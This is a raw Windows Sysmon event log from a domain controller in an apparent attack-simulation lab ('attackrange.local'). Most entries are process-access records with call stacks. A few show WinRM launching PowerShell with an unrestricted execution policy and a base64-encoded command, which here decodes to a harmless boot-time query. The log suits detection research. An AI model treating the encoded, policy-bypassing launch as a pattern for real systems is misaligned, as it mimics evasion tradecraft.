10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-851B-5FCF-E202-000000009001}47764904C:\Windows\system32\cmd.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.978{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-D214-110000000000}0x1114d20HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-851B-5FCF-E202-000000009001}4776C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-851B-5FCF-E102-000000009001}43522924C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-E202-000000009001}4776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-E202-000000009001}4776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-851B-5FCF-E002-000000009001}23643372C:\Windows\system32\WinrsHost.exe{10ACEC4A-851B-5FCF-E202-000000009001}4776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.973{10ACEC4A-851B-5FCF-E202-000000009001}4776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-D214-110000000000}0x1114d20HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 